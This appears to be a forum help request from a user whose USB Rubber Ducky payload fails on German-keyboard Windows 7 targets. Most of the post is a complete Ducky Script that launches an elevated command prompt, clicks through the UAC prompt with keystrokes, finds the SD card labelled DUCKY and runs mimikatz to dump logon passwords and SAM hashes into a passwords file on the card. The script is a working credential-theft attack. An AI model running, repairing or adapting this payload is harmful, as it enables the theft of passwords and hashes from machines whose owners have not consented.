Hi, the script dont work on my Ducky...i have flashed the twin ducky Firmware, rename the SD Card to "DUCKY" and copy the code into the decoder....everthing seems fine, but the payload does not run mimikatz...and dont save it to the passwort.txt file on the micro SD card. I use the German keyboard layout and my target machines are only WIN 7 64 bit. At the end of the script, the injected bin will opened by the editor, and then its finish.
Sorry for my extremly bad english...
I use this code:
REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y D REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER
To bypass the UAC in German keyboard layout, ALT y is also working like the UK layout?
